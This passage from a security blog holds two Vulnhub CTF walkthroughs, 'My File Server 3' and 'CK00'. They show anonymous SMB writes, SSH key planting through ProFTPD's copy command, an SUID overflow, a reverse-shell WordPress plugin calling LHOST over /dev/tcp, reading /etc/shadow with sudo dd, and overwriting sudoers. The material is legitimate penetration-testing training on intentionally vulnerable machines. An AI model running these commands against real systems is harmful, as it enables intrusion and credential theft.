 | \\192.168.2.11\smbdata:
 | Type: STYPE_DISKTREE
 | Comment: smbdata
 | Users: 0
 | Max Users: 
 | Path: C:\smbdata
 | Anonymous access: READ/WRITE
 | \\192.168.2.11\smbuser:
 | Type: STYPE_DISKTREE
 | Comment: smbuser
 | Users: 0
 | Max Users: 
 | Path: C:\home\smbuser\
 |_ Anonymous access: 
 Nmap done: 1 IP address (1 host up) scanned in 300.66 seconds

We know that there might be a “smbuser” on the network.

I choose to run Nikto for HTTP weak config listing, and found an entry for .ssh

#nikto -h http://192.168.2.11/

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.11
+ Target Hostname: 192.168.2.11
+ Target Port: 80
+ Start Time: 2020-04-06 01:01:31 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.

When I tested “.ssh” on web browser….. I got ssh folder, containing id_rsa and authorized_keys.

When I opened authorized_keys. Its confirm that “smbuser” is present in host machine or network.

I download file authorized_keys in my local Linux

#wget http://192.168.2.11/.ssh/authorized_keys

 --2020-04-06 01:05:15--  http://192.168.2.11/.ssh/authorized_keys
 Connecting to 192.168.2.11:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 410
 Saving to: ‘authorized_keys’ 
 authorized_keys         100%[==============================>]     410  --.-KB/s    in 0s      
 2020-04-06 01:05:15 (39.3 MB/s) - ‘authorized_keys’ saved [410/410]

We know that “smbdata” has read and write permission. So if we place the authorized_keys of our Linux and………………

#smbclient //192.168.2.11/smbdata

 Enter WORKGROUP\root's password: 
 Anonymous login successful
 Try "help" to get a list of possible commands.
 smb: \> ls
  .                                   D        0  Mon Apr  6 00:56:56 2020
  ..                                  D        0  Tue Feb 18 17:17:54 2020
  anaconda                            D        0  Tue Feb 18 17:18:15 2020
  audit                               D        0  Tue Feb 18 17:18:15 2020
  boot.log                            N     6120  Tue Feb 18 17:18:16 2020
  btmp                                N      384  Tue Feb 18 17:18:16 2020
  cron                                N     4813  Tue Feb 18 17:18:16 2020
  dmesg                               N    31389  Tue Feb 18 17:18:16 2020
  dmesg.old                           N    31389  Tue Feb 18 17:18:16 2020
  glusterfs                           D        0  Tue Feb 18 17:18:16 2020
  lastlog                             N   292292  Tue Feb 18 17:18:16 2020
  maillog                             N     1982  Tue Feb 18 17:18:16 2020
  messages                            N   684379  Tue Feb 18 17:18:17 2020
  ppp                                 D        0  Tue Feb 18 17:18:17 2020
  samba                               D        0  Tue Feb 18 17:18:17 2020
  secure                              N    11937  Tue Feb 18 17:18:17 2020
  spooler                             N        0  Tue Feb 18 17:18:17 2020
  tallylog                            N        0  Tue Feb 18 17:18:17 2020
  tuned                               D        0  Tue Feb 18 17:18:17 2020
  wtmp                                N    25728  Tue Feb 18 17:18:17 2020
  xferlog                             N      100  Tue Feb 18 17:18:17 2020
  yum.log                             N    10915  Tue Feb 18 17:18:17 2020
  sshd_config                         N     3906  Wed Feb 19 13:16:38 2020
  todo                                N      162  Tue Feb 25 19:52:29 2020
  id_rsa                              N     1766  Thu Mar 19 10:13:16 2020
  note.txt                            N      128  Thu Mar 19 10:23:12 2020

		19976192 blocks of size 1024. 18257932 blocks available
smb: \> exit

#cd .ssh/
#ls
 authorized_keys  id_rsa  id_rsa.pub  known_hosts
#smbclient //192.168.2.11/smbdata
 Enter WORKGROUP\root's password: 
 Anonymous login successful
 Try "help" to get a list of possible commands.
 smb: \> put authorized_keys 
 putting file authorized_keys as \authorized_keys (61.7 kb/s) (average 61.7 kb/s)
 smb: \>

It is successfully done. We know that port 2121 ProFTPD 1.3.5 has “file copy” vulnerability. So I log in in FTP 2121 without username and password. Then I copy authorized_keys from /smbdata to /home/smbuser/.ssh/authorized_keys

#telnet 192.168.2.11 2121

 Trying 192.168.2.11...
 Connected to 192.168.2.11.
 Escape character is '^]'.
  220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.2.11]
 site help
  214-The following SITE commands are recognized (* =>'s unimplemented)
  CPFR  pathname
  CPTO  pathname
  HELP
  CHGRP
  CHMOD
  214 Direct comments to root@localhost
 site cpfr /smbdata/authorized_keys
  350 File or directory exists, ready for destination name
 site cpto /home/smbuser/.ssh/authorized_keys
 250 Copy successful

Now I tried to take ssh from id_rsa file and yehhhhh we got a smbuser shell…

#ssh smbuser@192.168.2.11 -i id_rsa 

   ##############################################################################################
   #					  InfoSec Warrior                                       #             
   #                         --------- www.InfoSecWarrior.com ------------                      #
   #                                    My File Server - 3					#                    
   #  			    Just a simple addition to the problem                               #
   #                               Designed By :- CyberKnight                                   #
   #                                Twitter    :- @CyberKnight00                                #
   ##############################################################################################

 Last login: Mon Apr  6 01:39:47 2020 from 192.168.2.1
 [smbuser@fileserver ~]$ id 
  uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
 [smbuser@fileserver ~]$ hostname 
  fileserver

Here we got two folders at home but I didn’t get anything and we have no find and locate command for searching suid files. So I have manually searched and I got a file “esclate” which has suid bit of user bla.

[smbuser@fileserver ~]$  find 
 -bash: find: command not found
[smbuser@fileserver ~]$ ls -lha /usr/bin |grep esclate
 -rwsr-xr-x    1 bla  bla     7.4K Feb 27 00:21 esclate

so from this file, we can try to take “bla ” user shell. After feeding a lot of numbers and alphabets .. sometimes it gives “why are you here?” and sometimes “Segmentation fault” …

So I understood what’s happening here. I gave a value {number} which comes in between both the errors. and yeah “I got the bla user group”

[smbuser@fileserver ~]$ /usr/bin/esclate 
 123456789012345678901234567{27}
 Why are you here ?!
[smbuser@fileserver ~]$ /usr/bin/esclate
 123456789012345687901234567890123456{36}
 Segmentation fault
[smbuser@fileserver ~]$ /usr/bin/esclate          
 1234567890123456789012345678901{32}
 Why are you here ?!
[smbuser@fileserver ~]$ /usr/bin/esclate     
 1234567890123456789012345678901234{34}  
sh-4.2$ id
 uid=1001(bla) gid=1000(smbuser) groups=1001(bla),1000(smbuser)
sh-4.2$ hostname 
 fileserver
sh-4.2$ uname -a
 Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
sh-4.2$

Then I tried to go access bla directory and yeh I was finally in.

and got FLAG of bla user.

sh-4.2$ cd home
sh-4.2$ ls 
 bla  smbuser
sh-4.2$ cd bla
sh-4.2$ ls -lha
 total 40K
 drwx------  2 bla  bla  121 Feb 27 00:29 .
 drwxr-xr-x. 4 root root  30 Feb 25 16:21 ..
 lrwxrwxrwx  1 bla  bla    9 Feb 25 19:57 .bash_history -> /dev/null
 -rw-r--r--  1 bla  bla   18 Mar  6  2015 .bash_logout
 -rw-r--r--  1 bla  bla  193 Mar  6  2015 .bash_profile
 -rw-r--r--  1 bla  bla  231 Mar  6  2015 .bashrc
 -rw-rw-r--  1 bla  bla  516 Feb 27 00:29 user.txt
 -rw-------  1 bla  bla  731 Feb 26 23:36 .viminfo
 -rwxr-xr-x  1 root root 19K Feb 25 16:22 ynetd
sh-4.2$ cat user.txt
   _____ _ _      ____                                     _____ 
  |  ___(_) | ___/ ___|  ___ _ ____   _____ _ __          |___ / 
  | |_  | | |/ _ \___ \ / _ \ '__\ \ / / _ \ '__|  _____    |_ \ 
  |  _| | | |  __/___) |  __/ |   \ V /  __/ |    |_____|  ___) |
  |_|   |_|_|\___|____/ \___|_|    \_/ \___|_|            |____/                                                           
 Flag : 0aab4a2c6d75db7ca2542e0dacc3a30f
 you can crack this hash, because it is also my pasword
 note: crack it, itiseasy

so after cracking the hash, I got bla user password bla:itiseasy. After that, I checked sudo permissions and writes. and I got the two things which can run by Sudo “capsh” and “setcap”.

and I got the root shell…..

sh-4.2$ sudo -l
 Matching Defaults entries for bla on this host:
     requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
     env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
     _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 User bla may run the following commands on this host:
     (ALL) NOPASSWD: /usr/sbin/capsh, (ALL) /usr/sbin/setcap

sh-4.2$ sudo -u root /usr/sbin/capsh --
[root@fileserver bla]# id
 uid=0(root) gid=0(root) groups=0(root)
[root@fileserver bla]# cd /root/
[root@fileserver ~]# ls 
 proof.txt
[root@fileserver ~]# cat proof.txt 
     _______ __    _____                                       _____
    / ____(_) /__ / ___/___  ______   _____  _____            |__  /
   / /_  / / / _ \\__ \/ _ \/ ___/ | / / _ \/ ___/  ______     /_ < 
  / __/ / / /  __/__/ /  __/ /   | |/ /  __/ /     /_____/   ___/ / 
 /_/   /_/_/\___/____/\___/_/    |___/\___/_/               /____/  
                                                                
 flag : 7be300997079eaebcdf9975ede6746e9
[root@fileserver ~]# id
 uid=0(root) gid=0(root) groups=0(root)
[root@fileserver ~]# hostname
 fileserver
[root@fileserver ~]#

The post My File Server: 3 Walkthrough appeared first on Armour Infosec.

CK00: Vulnhub Walkthrough | Infosec Warrior CTF

Armour Infosec — Tue, 31 Mar 2020 08:57:21 +0000

I will share with you a new Walkthrough for Vulnhub machines. CK00: Vulnhub Walkthrough for the CTF Challenge Created by Vishal Biswas AKA Cyberknight. You can download here this CTF . It states the level is Easy and that is true. Again, this is in the eye of the beholder but I’ve seen some boxes where Easy isn’t exactly Easy. Or maybe it’s Easy but it’s a CTF style box. This isn’t that type of box. It’s just a poorly configured machine and it has either a few rabbit holes or a few steps I just skipped because you can. Either way, you explore a little if this is unfamiliar and that’s how you learn.

Penetration Testing Methodologies

Network Scan

Netdicover
Nmap

Enumeration

WordPress Enumeration
Local Hosts file entry

Exploit

WordPress plugin php injection.

Privilege Escalation

Horizontal Privilege Escalation
wp-config.php
sudo -l

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.2.4

netdiscover -i vboxnet0

Let’s proceed with network scan using Nmap aggressive scan as given below.

nmap -p- -sC -A -O 192.168.2.4

Enumeration

First thing we notice is port 80 is open and we see WordPress. When we check out the port in the browser.

We can see from the malformed page that we need to add an entry into our hosts file. When we try to access the admin page, we see what name we need to use in our hosts file

vim /etc/hosts

Eureka !!!!!!!!!! It’s work and finally got wordpress.

Now when we attempt to access the admin page, with credential admin:admin

Exploit

When I first started hacking and I came across a WordPress set, I would try all sorts of things to get PHP code into the site. Sometimes you can upload a shell as a plugin, sometimes you can upload a shell as media, both are intentional misconfigurations, and there are plugins that also allow for PHP.

You can just write your own Reverse Shell Plugin. Save yourself some headaches, just make this, use it, and store it for later use.

touch rshell.php
vim rshell.php
 & /dev/tcp/LHOST/LPORT 0>&1'");
 ?>
zip rshellplugin.zip rshell.php

Once we get it zipped, we move to the WordPress UI. Under Plugins, we select Add New

We activate our plugin:

We catch our shell. Yesssssssssssss………

nc -nlvp 1505

Privilege Escalation

We look around for user flag and found it.

We then move to wp–config.php file for credentials.

cat /var/www/html/wp-config.php

got password bla_is_my_password

Excellent! Here’s where we cut out a step or two. I saw a few things and maybe that’s how I’m supposed to get to bla1 but on a hunch, I guess the password is: bla1_is_my_password. I got ssh connection.

ssh bla1@192.168.2.4

Checking out my sudo privileges, I learn that I can execute /bin/rbash as the user ck-00 which essentially moves us into the next account.

sudo -u ck-00 /bin/rbash

There is sudo privileges as our new user.We can execute /bin/dd as root. dd allows us to “convert and copy a file” and it’s used for backups. We can also use it to read and write files.We should be able to read the /etc/shadow file as root.

sudo dd if=/etc/shadow

Excellent! We should also be able to write a new line into sudoers

echo "ck-00 ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers

root flag…..

Conclusion: It was an easy CTF with some loop and really nice concepts. It was really helpful for beginners and people preparing for OSCP. Thank to Vishal Biswas AKA Cyberknight . I hope to see more challenges like this in the future.

The post CK00: Vulnhub Walkthrough | Infosec Warrior CTF appeared first on Armour Infosec.